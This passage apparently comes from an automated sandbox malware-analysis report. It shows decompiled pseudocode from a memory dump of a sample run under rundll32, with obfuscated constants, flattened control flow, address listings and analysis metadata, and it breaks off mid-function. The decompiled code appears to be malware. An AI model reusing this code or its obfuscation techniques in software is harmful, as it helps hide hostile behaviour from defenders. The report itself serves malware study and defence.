				_v1624 = 0x2dc9df;
				_v1624 = _v1624 ^ 0xfde67a02;
				_v1624 = _v1624 >> 4;
				_v1624 = _v1624 ^ 0x0fd7f95a;
				_v1688 = 0xb27c91;
				_v1688 = _v1688 + 0xcc48;
				_v1688 = _v1688 + 0xffff6aea;
				_v1688 = _v1688 ^ 0x00b739bb;
				_v1676 = 0x9962ec;
				_v1676 = _v1676 + 0xd2bc;
				_t627 = 0x59;
				_t558 = 0x22;
				_v1676 = _v1676 * 0x31;
				_v1676 = _v1676 ^ 0x1d838c0c;
				_v1720 = 0x20e7d3;
				_v1720 = _v1720 / _t627;
				_v1720 = _v1720 / _t558;
				_v1720 = _v1720 / _t627;
				_v1720 = _v1720 ^ 0x0002b2fc;
				_v1652 = 0xf809ca;
				_v1652 = _v1652 | 0xf7ee8eed;
				_v1652 = _v1652 << 1;
				_v1652 = _v1652 ^ 0xeff238d7;
				_v1580 = 0x7cb108;
				_v1580 = _v1580 + 0x41b4;
				_v1580 = _v1580 ^ 0x0076b4d3;
				_v1668 = 0xb3209d;
				_t559 = 0x53;
				_v1668 = _v1668 / _t559;
				_v1668 = _v1668 << 0xd;
				_v1668 = _v1668 ^ 0x450753ed;
				_v1604 = 0x53775b;
				_v1604 = _v1604 | 0x32a41867;
				_v1604 = _v1604 ^ 0x32fba052;
				_v1636 = 0xbc3265;
				_v1636 = _v1636 + 0xffff23eb;
				_v1636 = _v1636 ^ 0xe68a0726;
				_v1636 = _v1636 ^ 0xe63f3d4e;
				_v1756 = 0xe1916f;
				_v1756 = _v1756 + 0x6ec8;
				_v1756 = _v1756 | 0xf937d932;
				_v1756 = _v1756 + 0xfffffd3f;
				_v1756 = _v1756 ^ 0xf9f085ba;
				_v1588 = 0x69c4ca;
				_v1588 = _v1588 + 0xe8a1;
				_v1588 = _v1588 ^ 0x00630ca4;
				_v1584 = 0x6b201e;
				_v1584 = _v1584 | 0x74aee044;
				_v1584 = _v1584 ^ 0x74eba3bf;
				_v1760 = 0xf230ab;
				_v1760 = _v1760 >> 9;
				_v1760 = _v1760 >> 0xa;
				_v1760 = _v1760 >> 4;
				_v1760 = _v1760 ^ 0x00016a96;
				_v1704 = 0x98b305;
				_v1704 = _v1704 + 0x69fd;
				_v1704 = _v1704 ^ 0x979b8a6a;
				_v1704 = _v1704 + 0xffff998b;
				_v1704 = _v1704 ^ 0x9709d1d7;
				_v1736 = 0xce8702;
				_v1736 = _v1736 >> 0xa;
				_v1736 = _v1736 + 0x7a8b;
				_v1736 = _v1736 << 1;
				_v1736 = _v1736 ^ 0x000e6a30;
				_v1740 = 0x4c6a4b;
				_v1740 = _v1740 << 0xb;
				_v1740 = _v1740 | 0x0577b2ac;
				_v1740 = _v1740 + 0xffff4db5;
				_v1740 = _v1740 ^ 0x6775c844;
				_v1748 = 0x8b8c8;
				_t560 = 0x14;
				_v1748 = _v1748 / _t560;
				_t561 = 0x67;
				_v1748 = _v1748 / _t561;
				_t562 = 7;
				_v1748 = _v1748 * 0x36;
				_v1748 = _v1748 ^ 0x000fee79;
				_v1660 = 0xc3e5ac;
				_v1660 = _v1660 + 0xffffa1ff;
				_t563 = 0x46;
				_v1660 = _v1660 / _t562;
				_v1660 = _v1660 ^ 0x001e32d9;
				_v1664 = 0x1a636c;
				_v1664 = _v1664 | 0xf6dbfbcf;
				_v1664 = _v1664 ^ 0xf6df054d;
				_v1724 = 0xea18bc;
				_v1724 = _v1724 / _t563;
				_v1724 = _v1724 | 0x2d596700;
				_v1724 = _v1724 >> 1;
				_v1724 = _v1724 ^ 0x16a5f059;
				_v1672 = 0x567483;
				_v1672 = _v1672 >> 7;
				_v1672 = _v1672 + 0xffffe0a0;
				_v1672 = _v1672 ^ 0x000eacf4;
				_v1680 = 0x757070;
				_v1680 = _v1680 >> 0xd;
				_v1680 = _v1680 ^ 0xeacc73ee;
				_v1680 = _v1680 ^ 0xeac5b183;
				_v1648 = 0x45ab81;
				_v1648 = _v1648 >> 6;
				_v1648 = _v1648 + 0xffff50ab;
				_v1648 = _v1648 ^ 0x000d5f86;
				_v1708 = 0x462580;
				_t564 = 0xb;
				_t550 = _v1568;
				_v1708 = _v1708 / _t564;
				_t565 = 0x75;
				_v1708 = _v1708 / _t565;
				_t566 = 0x37;
				_v1708 = _v1708 * 0x50;
				_v1708 = _v1708 ^ 0x00078e43;
				_v1592 = 0x6b02b0;
				_v1592 = _v1592 + 0xffff70eb;
				_v1592 = _v1592 ^ 0x006caa59;
				_v1600 = 0x2f56d1;
				_v1600 = _v1600 ^ 0x1dd1a998;
				_v1600 = _v1600 ^ 0x1df0badb;
				_v1656 = 0xa683af;
				_v1656 = _v1656 / _t566;
				_v1656 = _v1656 << 1;
				_v1656 = _v1656 ^ 0x0003d06f;
				_v1608 = 0x6ef6d9;
				_v1608 = _v1608 + 0xd0f0;
				_v1608 = _v1608 ^ 0x006391fa;
				_v1700 = 0x90b08b;
				_v1700 = _v1700 + 0x4c46;
				_v1700 = _v1700 | 0x5cc03ba9;
				_t567 = 0x12;
				_v1700 = _v1700 / _t567;
				_v1700 = _v1700 ^ 0x052b7d82;
				_v1692 = 0x3d9f33;
				_v1692 = _v1692 + 0xffff6a07;
				_v1692 = _v1692 ^ 0xa1c8547f;
				_v1692 = _v1692 ^ 0xa1f3c56b;
				_v1632 = 0x96979b;
				_v1632 = _v1632 / _t627;
				_v1632 = _v1632 >> 0xa;
				_v1632 = _v1632 ^ 0x0009a5bf;
				_v1640 = 0x6f31a2;
				_v1640 = _v1640 ^ 0x3a2ad5a2;
				_v1640 = _v1640 ^ 0xeb2d3a23;
				_v1640 = _v1640 ^ 0xd16332d1;
				while(1) {
					L1:
					_t568 = 0x5c;
					while(1) {
						L2:
						_t526 = 0xdd30c3;
						do {
							L3:
							if(_t625 == _t526) {
								_t531 = E002CC2CE(_v1664, _v1648, _t550, _v1708, _v1592, _v1600, _v1716, _v1656, _v1564, _v1608,  &_v1560, 2 + E002CBA68(_v1664, _v1724, _v1672,  &_v1560, _v1680) * 2);
								_t631 =  &(_t631[0xd]);
								__eflags = _t531;
								_t625 = 0xd26443e;
								_t471 = _t531 == 0;
								__eflags = _t471;
								_v1568 = 0 | _t471;
								goto L17;
							} else {
								if(_t625 == 0x971d92c) {
									_push(_t568);
									E002BEA7B( &_v520, _v1696, _v1616, _t568, _v1572, _v1732, _v1628);
									_t631 =  &(_t631[7]);
									_t625 = 0xf5a31c5;
									goto L1;
								} else {
									if(_t625 == 0x9b520f4) {
										_t551 =  *0x2d520c; // 0x0
										_t552 = _t551 + 0x220;
										while(1) {
											__eflags =  *_t552 - _t568;
											if(__eflags == 0) {
												break;
											}
											_t552 = _t552 + 2;
											__eflags = _t552;
										}
										_t550 = _t552 + 2;
										_t625 = 0xaa323c9;
										goto L2;
									} else {
										if(_t625 == 0xaa323c9) {
											_push(_v1636);
											_push(_v1604);
											_t572 = _v1580;
											_push(0x2b118c);
											__eflags = E002B8786(_v1756, _v1668, _v1580,  &_v1564, _v1588, E002BAB66(_v1580, _v1668, __eflags), _v1584, _v1760, _v1580, _t572, _v1704, _v1644, _v1596, _t572, _v1736);
											_t625 =  ==  ? 0xdd30c3 : 0x546d466;
											E002BAE03(_v1740, _v1748, _v1660, _t534);
											_t631 =  &(_t631[0x12]);
											L17:
											_t526 = 0xdd30c3;
											_t568 = 0x5c;
											goto L18;
										} else {
											if(_t625 == 0xd26443e) {
												E002B7AF8(_v1700, _v1692, _v1564, _v1632, _v1640);
											} else {
												_t640 = _t625 - 0xf5a31c5;
												if(_t625 != 0xf5a31c5) {
													goto L18;
												} else {
													_push(_v1728);
													_push(_v1752);
													_push(0x2b10fc);
													_t540 = E002BAB66(_v1712, _v1620, _t640);
													E002CC66E( &_v1040, _t640);
													_t544 =  *0x2d520c; // 0x0
													_t546 =  *0x2d520c; // 0x0
													_t427 =  &_v1684; // 0xe63f3d4e
													E002CBDB5( &_v1560, _t640, _v1744,  *_t427, _v1576, _v1612, _t546 + 0x220, _v1624, _v1688, _t544 + 8,  &_v1040,  &_v520, _t540);
													E002BAE03(_v1676, _v1720, _v1652, _t540);
													_t631 =  &(_t631[0x10]);
													_t625 = 0x9b520f4;
													while(1) {
														L1:
														_t568 = 0x5c;
														L2:
														_t526 = 0xdd30c3;
														goto L3;
													}
												}
											}
										}
									}
								}
							}
							L21:
							return _v1568;
							L18:
							__eflags = _t625 - 0x546d466;
						} while (__eflags != 0);
						goto L21;
					}
				}
			}



















































































                                                                                                                      0x002cd8d7
                                                                                                                      0x002cd8dd
                                                                                                                      0x002cd8ec
                                                                                                                      0x002cd900
                                                                                                                      0x002cd905
                                                                                                                      0x002cd90e
                                                                                                                      0x002cd919
                                                                                                                      0x002cd91e
                                                                                                                      0x002cd930
                                                                                                                      0x002cd935
                                                                                                                      0x002cd93e
                                                                                                                      0x002cd949
                                                                                                                      0x002cd95b
                                                                                                                      0x002cd960
                                                                                                                      0x002cd969
                                                                                                                      0x002cd974
                                                                                                                      0x002cd97f
                                                                                                                      0x002cd987
                                                                                                                      0x002cd98b
                                                                                                                      0x002cd98e
                                                                                                                      0x002cd992
                                                                                                                      0x002cd99a
                                                                                                                      0x002cd9a7
                                                                                                                      0x002cd9af
                                                                                                                      0x002cd9b7
                                                                                                                      0x002cd9bc
                                                                                                                      0x002cd9c4
                                                                                                                      0x002cd9cf
                                                                                                                      0x002cd9d7
                                                                                                                      0x002cd9e2
                                                                                                                      0x002cd9ef
                                                                                                                      0x002cd9f3
                                                                                                                      0x002cd9fb
                                                                                                                      0x002cda00
                                                                                                                      0x002cda08
                                                                                                                      0x002cda13
                                                                                                                      0x002cda26
                                                                                                                      0x002cda2d
                                                                                                                      0x002cda38
                                                                                                                      0x002cda40
                                                                                                                      0x002cda48
                                                                                                                      0x002cda55
                                                                                                                      0x002cda59
                                                                                                                      0x002cda61
                                                                                                                      0x002cda6c
                                                                                                                      0x002cda74
                                                                                                                      0x002cda7f
                                                                                                                      0x002cda8c
                                                                                                                      0x002cda90
                                                                                                                      0x002cda95
                                                                                                                      0x002cda9a
                                                                                                                      0x002cdaa2
                                                                                                                      0x002cdaaf
                                                                                                                      0x002cdab8
                                                                                                                      0x002cdabc
                                                                                                                      0x002cdac3
                                                                                                                      0x002cdacb
                                                                                                                      0x002cdad3
                                                                                                                      0x002cdadb
                                                                                                                      0x002cdae0
                                                                                                                      0x002cdae5
                                                                                                                      0x002cdaed
                                                                                                                      0x002cdafb
                                                                                                                      0x002cdb00
                                                                                                                      0x002cdb04
                                                                                                                      0x002cdb0c
                                                                                                                      0x002cdb14
                                                                                                                      0x002cdb1f
                                                                                                                      0x002cdb2a
                                                                                                                      0x002cdb35
                                                                                                                      0x002cdb40
                                                                                                                      0x002cdb4b
                                                                                                                      0x002cdb56
                                                                                                                      0x002cdb61
                                                                                                                      0x002cdb6c
                                                                                                                      0x002cdb74
                                                                                                                      0x002cdb7f
                                                                                                                      0x002cdb87
                                                                                                                      0x002cdb8f
                                                                                                                      0x002cdb97
                                                                                                                      0x002cdb9f
                                                                                                                      0x002cdba7
                                                                                                                      0x002cdbb6
                                                                                                                      0x002cdbb9
                                                                                                                      0x002cdbba
                                                                                                                      0x002cdbbe
                                                                                                                      0x002cdbc6
                                                                                                                      0x002cdbd6
                                                                                                                      0x002cdbe2
                                                                                                                      0x002cdbee
                                                                                                                      0x002cdbf4
                                                                                                                      0x002cdbfc
                                                                                                                      0x002cdc07
                                                                                                                      0x002cdc12
                                                                                                                      0x002cdc19
                                                                                                                      0x002cdc24
                                                                                                                      0x002cdc2f
                                                                                                                      0x002cdc3a
                                                                                                                      0x002cdc45
                                                                                                                      0x002cdc51
                                                                                                                      0x002cdc54
                                                                                                                      0x002cdc58
                                                                                                                      0x002cdc5d
                                                                                                                      0x002cdc65
                                                                                                                      0x002cdc70
                                                                                                                      0x002cdc7b
                                                                                                                      0x002cdc86
                                                                                                                      0x002cdc91
                                                                                                                      0x002cdc9c
                                                                                                                      0x002cdca7
                                                                                                                      0x002cdcb2
                                                                                                                      0x002cdcba
                                                                                                                      0x002cdcc2
                                                                                                                      0x002cdcca
                                                                                                                      0x002cdcd2
                                                                                                                      0x002cdcda
                                                                                                                      0x002cdce7
                                                                                                                      0x002cdcf2
                                                                                                                      0x002cdcfd
                                                                                                                      0x002cdd08
                                                                                                                      0x002cdd13
                                                                                                                      0x002cdd1e
                                                                                                                      0x002cdd26
                                                                                                                      0x002cdd2b
                                                                                                                      0x002cdd30
                                                                                                                      0x002cdd35
                                                                                                                      0x002cdd3d
                                                                                                                      0x002cdd45
                                                                                                                      0x002cdd4d
                                                                                                                      0x002cdd55
                                                                                                                      0x002cdd5d
                                                                                                                      0x002cdd65
                                                                                                                      0x002cdd6d
                                                                                                                      0x002cdd72
                                                                                                                      0x002cdd7a
                                                                                                                      0x002cdd7e
                                                                                                                      0x002cdd86
                                                                                                                      0x002cdd8e
                                                                                                                      0x002cdd93
                                                                                                                      0x002cdd9b
                                                                                                                      0x002cdda3
                                                                                                                      0x002cddab
                                                                                                                      0x002cddb9
                                                                                                                      0x002cddbe
                                                                                                                      0x002cddc8
                                                                                                                      0x002cddcd
                                                                                                                      0x002cddd8
                                                                                                                      0x002cdddb
                                                                                                                      0x002cdddf
                                                                                                                      0x002cdde7
                                                                                                                      0x002cddef
                                                                                                                      0x002cddfd
                                                                                                                      0x002cddfe
                                                                                                                      0x002cde04
                                                                                                                      0x002cde0c
                                                                                                                      0x002cde14
                                                                                                                      0x002cde1c
                                                                                                                      0x002cde24
                                                                                                                      0x002cde34
                                                                                                                      0x002cde38
                                                                                                                      0x002cde40
                                                                                                                      0x002cde44
                                                                                                                      0x002cde4c
                                                                                                                      0x002cde54
                                                                                                                      0x002cde59
                                                                                                                      0x002cde61
                                                                                                                      0x002cde69
                                                                                                                      0x002cde71
                                                                                                                      0x002cde76
                                                                                                                      0x002cde7e
                                                                                                                      0x002cde86
                                                                                                                      0x002cde91
                                                                                                                      0x002cde99
                                                                                                                      0x002cdea4
                                                                                                                      0x002cdeb1
                                                                                                                      0x002cdebd
                                                                                                                      0x002cdec2
                                                                                                                      0x002cdec9
                                                                                                                      0x002cded8
                                                                                                                      0x002cdedd
                                                                                                                      0x002cdee8
                                                                                                                      0x002cdeeb
                                                                                                                      0x002cdeef
                                                                                                                      0x002cdef7
                                                                                                                      0x002cdf02
                                                                                                                      0x002cdf0d
                                                                                                                      0x002cdf18
                                                                                                                      0x002cdf23
                                                                                                                      0x002cdf2e
                                                                                                                      0x002cdf39
                                                                                                                      0x002cdf49
                                                                                                                      0x002cdf4d
                                                                                                                      0x002cdf51
                                                                                                                      0x002cdf59
                                                                                                                      0x002cdf64
                                                                                                                      0x002cdf6f
                                                                                                                      0x002cdf7a
                                                                                                                      0x002cdf82
                                                                                                                      0x002cdf8a
                                                                                                                      0x002cdf96
                                                                                                                      0x002cdf9b
                                                                                                                      0x002cdf9f
                                                                                                                      0x002cdfa7
                                                                                                                      0x002cdfaf
                                                                                                                      0x002cdfb7
                                                                                                                      0x002cdfbf
                                                                                                                      0x002cdfc7
                                                                                                                      0x002cdfdb
                                                                                                                      0x002cdfe2
                                                                                                                      0x002cdfea
                                                                                                                      0x002cdff5
                                                                                                                      0x002ce000
                                                                                                                      0x002ce00b
                                                                                                                      0x002ce016
                                                                                                                      0x002ce021
                                                                                                                      0x002ce021
                                                                                                                      0x002ce023
                                                                                                                      0x002ce024
                                                                                                                      0x002ce024
                                                                                                                      0x002ce024
                                                                                                                      0x002ce029
                                                                                                                      0x002ce029
                                                                                                                      0x002ce02b
                                                                                                                      0x002ce25d
                                                                                                                      0x002ce264
                                                                                                                      0x002ce267
                                                                                                                      0x002ce269
                                                                                                                      0x002ce26e
                                                                                                                      0x002ce26e
                                                                                                                      0x002ce271
                                                                                                                      0x00000000
                                                                                                                      0x002ce031
                                                                                                                      0x002ce037
                                                                                                                      0x002ce1c5
                                                                                                                      0x002ce1eb
                                                                                                                      0x002ce1f0
                                                                                                                      0x002ce1f3
                                                                                                                      0x00000000
                                                                                                                      0x002ce03d
                                                                                                                      0x002ce043
                                                                                                                      0x002ce1a5
                                                                                                                      0x002ce1ab
                                                                                                                      0x002ce1b6
                                                                                                                      0x002ce1b6
                                                                                                                      0x002ce1b9
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002ce1b3
                                                                                                                      0x002ce1b3
                                                                                                                      0x002ce1b3
                                                                                                                      0x002ce1bb
                                                                                                                      0x002ce1be
                                                                                                                      0x00000000
                                                                                                                      0x002ce049
                                                                                                                      0x002ce04b
                                                                                                                      0x002ce113
                                                                                                                      0x002ce11a
                                                                                                                      0x002ce125
                                                                                                                      0x002ce12c
                                                                                                                      0x002ce179
                                                                                                                      0x002ce195
                                                                                                                      0x002ce198
                                                                                                                      0x002ce19d
                                                                                                                      0x002ce278
                                                                                                                      0x002ce27a
                                                                                                                      0x002ce27f
                                                                                                                      0x00000000
                                                                                                                      0x002ce051
                                                                                                                      0x002ce057
                                                                                                                      0x002ce2ab
                                                                                                                      0x002ce05d
                                                                                                                      0x002ce05d
                                                                                                                      0x002ce063
                                                                                                                      0x00000000
                                                                                                                      0x002ce069
                                                                                                                      0x002ce069
                                                                                                                      0x002ce06d
                                                                                                                      0x002ce07c
                                                                                                                      0x002ce081
                                                                                                                      0x002ce08f
                                                                                                                      0x002ce0aa
                                                                                                                      0x002ce0c5
                                                                                                                      0x002ce0de
                                                                                                                      0x002ce0e9
                                                                                                                      0x002ce101
                                                                                                                      0x002ce106
                                                                                                                      0x002ce109
                                                                                                                      0x002ce021
                                                                                                                      0x002ce021
                                                                                                                      0x002ce023
                                                                                                                      0x002ce024
                                                                                                                      0x002ce024
                                                                                                                      0x00000000
                                                                                                                      0x002ce024
                                                                                                                      0x002ce021
                                                                                                                      0x002ce063
                                                                                                                      0x002ce057
                                                                                                                      0x002ce04b
                                                                                                                      0x002ce043
                                                                                                                      0x002ce037
                                                                                                                      0x002ce2b3
                                                                                                                      0x002ce2c4
                                                                                                                      0x002ce280
                                                                                                                      0x002ce280
                                                                                                                      0x002ce280
                                                                                                                      0x00000000
                                                                                                                      0x002ce28c
                                                                                                                      0x002ce024

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #:-$'$>D&$>D&$FL$JRP$KjL$N=?$YU$[wS$dkY$ppu
                                                                                                                      • API String ID: 0-3845620242
                                                                                                                      • Opcode ID: 90fd9ba933b090ecac2b4e2d189d7c432e51cc165c9e3354cd45aacc09fcc7c4
                                                                                                                      • Instruction ID: 5023e428865424453a418f02b804e83719f7c6142c06bf5351987a7bd4d57621
                                                                                                                      • Opcode Fuzzy Hash: 90fd9ba933b090ecac2b4e2d189d7c432e51cc165c9e3354cd45aacc09fcc7c4
                                                                                                                      • Instruction Fuzzy Hash: 3432F172508380DFD368CF65C94AB8BBBE2FBC4358F108A1DE19986260D7B59959CF03
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002CEE94 Relevance: 14.2, Strings: 11, Instructions: 427COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E002CEE94(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v4;
				char _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				intOrPtr _t445;
				void* _t448;
				intOrPtr _t453;
				signed int _t467;
				intOrPtr _t470;
				intOrPtr _t471;
				void* _t505;
				signed int _t512;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				signed int _t516;
				signed int _t517;
				signed int _t518;
				signed int _t519;
				signed int _t520;
				intOrPtr* _t521;
				signed int _t524;
				intOrPtr _t529;
				signed int* _t531;
				void* _t533;

				_t471 = __ecx;
				_push(_a8);
				_v104 = __ecx;
				_push(_a4);
				_v12 = __edx;
				_push(__edx);
				_push(__ecx);
				E002BCF25(__edx);
				_v124 = 0x410507;
				_t531 =  &(( &_v192)[4]);
				_v124 = _v124 ^ 0x83a2264d;
				_v124 = _v124 >> 0xa;
				_t470 = 0;
				_t529 = 0;
				_t512 = 0x17;
				_t524 = 0xd582a45;
				_v124 = _v124 * 3;
				_v124 = _v124 ^ 0x0062ea59;
				_v164 = 0x8ee5f4;
				_v164 = _v164 << 0xd;
				_v164 = _v164 ^ 0xc2bd4067;
				_v164 = _v164 + 0xffffa455;
				_v164 = _v164 ^ 0x1e0364bd;
				_v116 = 0xd0c3db;
				_v116 = _v116 + 0x7244;
				_v116 = _v116 + 0xffff5950;
				_v116 = _v116 * 0x7d;
				_v116 = _v116 ^ 0x65d60932;
				_v76 = 0x69c3d0;
				_v76 = _v76 + 0x2803;
				_v76 = _v76 ^ 0x0109b4af;
				_v76 = _v76 ^ 0x016cb6ed;
				_v84 = 0x591f9b;
				_v84 = _v84 ^ 0x136c22a2;
				_v84 = _v84 + 0xbc03;
				_v84 = _v84 ^ 0x133eabdb;
				_v40 = 0x32843;
				_v40 = _v40 + 0x6836;
				_v40 = _v40 ^ 0x000a5f7a;
				_v96 = 0x3c9c05;
				_v96 = _v96 * 0x1a;
				_v96 = _v96 ^ 0xb1c6e809;
				_v96 = _v96 ^ 0xb7e34fe8;
				_v56 = 0xda9312;
				_v56 = _v56 / _t512;
				_v56 = _v56 ^ 0x0000b271;
				_v132 = 0xda0ea8;
				_v132 = _v132 | 0xaeef9bf7;
				_t513 = 0x71;
				_v132 = _v132 / _t513;
				_v132 = _v132 ^ 0x01890540;
				_v44 = 0x61f218;
				_v44 = _v44 + 0xffff41d7;
				_v44 = _v44 ^ 0x006fe265;
				_v144 = 0x306d33;
				_v144 = _v144 + 0xfffff564;
				_v144 = _v144 * 0x6e;
				_v144 = _v144 + 0xffff469c;
				_v144 = _v144 ^ 0x14c9b51d;
				_v52 = 0x70de34;
				_v52 = _v52 << 3;
				_v52 = _v52 ^ 0x038f9e4d;
				_v36 = 0x6cb1ac;
				_v36 = _v36 + 0x1a54;
				_v36 = _v36 ^ 0x00646b3f;
				_v152 = 0x976d54;
				_v152 = _v152 ^ 0x53b4556c;
				_v152 = _v152 ^ 0x5116bac9;
				_v152 = _v152 ^ 0x4d195c93;
				_v152 = _v152 ^ 0x4f27d4c2;
				_v28 = 0x414a88;
				_v28 = _v28 | 0x717fc69d;
				_v28 = _v28 ^ 0x71799fc5;
				_v160 = 0xc7706;
				_v160 = _v160 + 0xc91f;
				_v160 = _v160 | 0xaa894ceb;
				_v160 = _v160 + 0xffffb57b;
				_v160 = _v160 ^ 0xaa88db85;
				_v168 = 0x67f23c;
				_v168 = _v168 ^ 0x8eced2dd;
				_v168 = _v168 ^ 0x27c733d3;
				_v168 = _v168 ^ 0x736125b9;
				_v168 = _v168 ^ 0xda0ef7f2;
				_v176 = 0x85bb3;
				_v176 = _v176 | 0x89ba1603;
				_v176 = _v176 >> 8;
				_t514 = 0x6a;
				_v176 = _v176 / _t514;
				_v176 = _v176 ^ 0x0009ce33;
				_v136 = 0xb0a921;
				_v136 = _v136 ^ 0x2367151f;
				_v136 = _v136 ^ 0x64865221;
				_t515 = 0x35;
				_v136 = _v136 * 0x3f;
				_v136 = _v136 ^ 0x8d2b953d;
				_v148 = 0x2df722;
				_v148 = _v148 * 0x30;
				_v148 = _v148 + 0xd30d;
				_v148 = _v148 | 0x68c8f2ae;
				_v148 = _v148 ^ 0x68db5c3d;
				_v92 = 0xa4f97a;
				_v92 = _v92 ^ 0x325a0e28;
				_v92 = _v92 + 0x57de;
				_v92 = _v92 ^ 0x32f51d21;
				_v32 = 0xa83f00;
				_v32 = _v32 + 0xffff47e2;
				_v32 = _v32 ^ 0x00a2bde7;
				_v156 = 0xe5ea35;
				_t178 =  &_v156; // 0xe5ea35
				_v156 =  *_t178 / _t515;
				_v156 = _v156 << 5;
				_v156 = _v156 + 0x3621;
				_v156 = _v156 ^ 0x008c998d;
				_v180 = 0x37bb8c;
				_v180 = _v180 ^ 0x8c6790c9;
				_t516 = 0x3c;
				_v180 = _v180 * 0x44;
				_v180 = _v180 | 0x3ef8ecb7;
				_v180 = _v180 ^ 0x7ff3e314;
				_v88 = 0x10d686;
				_v88 = _v88 + 0xffff44b6;
				_v88 = _v88 / _t516;
				_v88 = _v88 ^ 0x000573bd;
				_v64 = 0x2cf4a8;
				_v64 = _v64 << 0xb;
				_v64 = _v64 + 0xffff4c9b;
				_v64 = _v64 ^ 0x67a6f27b;
				_v188 = 0x434d7c;
				_t218 =  &_v188; // 0x434d7c
				_v188 =  *_t218 * 0x14;
				_v188 = _v188 + 0xffff53dc;
				_v188 = _v188 * 0x58;
				_v188 = _v188 ^ 0xce78d82e;
				_v48 = 0x39a498;
				_v48 = _v48 + 0xd90b;
				_v48 = _v48 ^ 0x00328937;
				_v172 = 0x329194;
				_v172 = _v172 + 0x15c2;
				_v172 = _v172 ^ 0x8846dc1f;
				_v172 = _v172 + 0x561;
				_v172 = _v172 ^ 0x8878b13b;
				_v140 = 0x921bc4;
				_v140 = _v140 | 0xc689e64a;
				_v140 = _v140 >> 0xc;
				_v140 = _v140 ^ 0x67a6be9d;
				_v140 = _v140 ^ 0x67a0761b;
				_v72 = 0xa3a418;
				_t517 = 0x26;
				_v72 = _v72 * 0x26;
				_v72 = _v72 >> 0x10;
				_v72 = _v72 ^ 0x0002c06b;
				_v108 = 0xd1ae1a;
				_v108 = _v108 ^ 0x567f87f9;
				_v108 = _v108 | 0x0eb5e220;
				_v108 = _v108 ^ 0x558f672f;
				_v108 = _v108 ^ 0x0b3c3f9a;
				_v80 = 0x5d29a8;
				_v80 = _v80 | 0x5a2f4123;
				_v80 = _v80 / _t517;
				_v80 = _v80 ^ 0x0265326d;
				_v184 = 0x50dc21;
				_v184 = _v184 + 0xffff863b;
				_v184 = _v184 + 0xffff7ebb;
				_v184 = _v184 + 0x5f54;
				_v184 = _v184 ^ 0x005a5f37;
				_v68 = 0x13fcd3;
				_v68 = _v68 + 0x7ca8;
				_v68 = _v68 >> 3;
				_v68 = _v68 ^ 0x000ac947;
				_v24 = 0xc2d10f;
				_v24 = _v24 + 0xffff657d;
				_v24 = _v24 ^ 0x00c52471;
				_v192 = 0x48c156;
				_v192 = _v192 >> 4;
				_t518 = 0x2f;
				_v192 = _v192 * 0x2f;
				_v192 = _v192 + 0xffffa98f;
				_v192 = _v192 ^ 0x00d9c1bc;
				_v112 = 0xb16c9;
				_v112 = _v112 >> 0xe;
				_v112 = _v112 << 0x10;
				_v112 = _v112 / _t518;
				_v112 = _v112 ^ 0x00028b59;
				_v120 = 0x2563ad;
				_t519 = 0x30;
				_v120 = _v120 / _t519;
				_v120 = _v120 + 0xffffe9b6;
				_v120 = _v120 >> 8;
				_v120 = _v120 ^ 0x000e86e4;
				_v60 = 0x629492;
				_t520 = 0x32;
				_v60 = _v60 / _t520;
				_v60 = _v60 << 0xa;
				_v60 = _v60 ^ 0x07e42de9;
				_v128 = 0x197221;
				_v128 = _v128 >> 0xf;
				_v128 = _v128 << 1;
				_v128 = _v128 * 0x2e;
				_v128 = _v128 ^ 0x0004057d;
				_t521 = _v16;
				while(1) {
					L1:
					goto L2;
					do {
						while(1) {
							L2:
							_t533 = _t524 - 0x94e79b7;
							if(_t533 > 0) {
								break;
							}
							if(_t533 == 0) {
								_push(_t471);
								_push(_t471);
								_t445 = E002C3512(0x20000);
								_t470 = _t445;
								if(_t470 != 0) {
									_t524 = 0x4150ae2;
									goto L12;
								}
							} else {
								if(_t524 == 0x35d4444) {
									_t453 = E002B2E96(_v148, _v92, _v32, _v116, _v156,  *_t521, _v12);
									_t471 = _v104;
									_t531 =  &(_t531[5]);
									_v20 = _t453;
									_t505 = 0x812254d;
									_t524 =  !=  ? 0x812254d : 0x4f6d4ac;
									continue;
								} else {
									if(_t524 == 0x4150ae2) {
										_push(_t471);
										_push(_t471);
										_t529 = E002C3512(0x2000);
										_t524 =  !=  ? 0xd2f1d9f : 0x98aa4b1;
										goto L12;
									} else {
										if(_t524 == 0x4f6d4ac) {
											_t521 = _t521 + 0x2c;
											asm("sbb esi, esi");
											_t524 = (_t524 & 0xf5c6e621) + 0xd965e23;
											continue;
										} else {
											if(_t524 == 0x53e4020) {
												E002C8CD6(_v164, _t471, _t529, _v108, _v80);
												_t531 =  &(_t531[3]);
												L11:
												_t524 = 0xd965e23;
												L12:
